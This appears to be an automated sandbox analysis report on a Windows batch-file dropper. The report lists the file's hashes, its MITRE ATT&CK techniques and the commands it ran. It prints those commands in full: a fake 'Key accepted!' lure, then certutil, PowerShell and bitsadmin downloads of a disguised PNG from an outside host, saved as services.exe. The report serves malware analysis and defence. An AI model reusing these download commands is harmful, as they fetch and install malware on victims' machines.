6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd

Analysis

max time kernel
680s
max time network
691s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
26/07/2024, 17:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

frdddd.bat
Size

1KB
MD5

88ddf78c950140af764db059bec7dec8
SHA1

ad23a435fcaf3a66a4caa483e55b47e52a9db902
SHA256

6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd
SHA512

f0a486fcf8890a2eacfcd704b93f102e13b0ea21589a2740a81fb48818c101c95cbb8c01b381915186578b8a4d7aaf11dcd53f467f7618b60189a47f3a4486cf

Score

8^/10

dropper execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2692	powershell.exe
1464	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3020	bitsadmin.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2692	powershell.exe
1464	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 2692	2716	cmd.exe	31
PID 2716 wrote to memory of 2692	2716	cmd.exe	31
PID 2716 wrote to memory of 2692	2716	cmd.exe	31
PID 2716 wrote to memory of 2740	2716	cmd.exe	32
PID 2716 wrote to memory of 2740	2716	cmd.exe	32
PID 2716 wrote to memory of 2740	2716	cmd.exe	32
PID 2716 wrote to memory of 1464	2716	cmd.exe	34
PID 2716 wrote to memory of 1464	2716	cmd.exe	34
PID 2716 wrote to memory of 1464	2716	cmd.exe	34
PID 2716 wrote to memory of 3020	2716	cmd.exe	35
PID 2716 wrote to memory of 3020	2716	cmd.exe	35
PID 2716 wrote to memory of 3020	2716	cmd.exe	35

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2692
- C:\Windows\system32\certutil.exe
  certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
  2⤵
  PID:2740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\system32\bitsadmin.exe
  bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
  2⤵
  - Download via BitsAdmin
  PID:3020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
33699b0d456ab857c654d32bb2e3d0dd

SHA1
41f8ea34091911ce5bd3bb1ae0001b2b7757afe3

SHA256
856a97eb624bc867818df6621476301d7e5fee700d75ad3d1c60e0e22335c567

SHA512
a443e18f62712d18fa6733382888036ea3440cfcf016827d869421ec5c87dc592de2f4d36d875815c47c4b68b3815a6abc5be5621a70c4c87ddf3cef2a90410d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUKDE7OPGAIDYLA7PF3Z.temp

Filesize
7KB

MD5
2274ec55bb8524294bd4da2157137a42

SHA1
7ca9c4c80357eaa63a7fc356051808eff70bb445

SHA256
db4f6c51f3188a40d7f633f729530873e4aa6191e466a66f174c9fd880a1d1fe

SHA512
a5d5ab9da17495659b99a8131742f7d659344febe5f6ca596ec5c202389c949387923265879ef2e03a1bce9bdd52d749ff7c7cec627f385fbdec929fe41372c8

Download Submit
memory/1464-19-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/1464-18-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2692-7-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

Filesize
9.6MB

Download
memory/2692-8-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

Filesize
9.6MB

Download
memory/2692-10-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

Filesize
9.6MB

Download
memory/2692-11-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

Filesize
9.6MB

Download
memory/2692-12-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

Filesize
9.6MB

Download
memory/2692-9-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

Filesize
9.6MB

Download
memory/2692-4-0x000007FEF460E000-0x000007FEF460F000-memory.dmp

Filesize
4KB

Download
memory/2692-6-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/2692-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download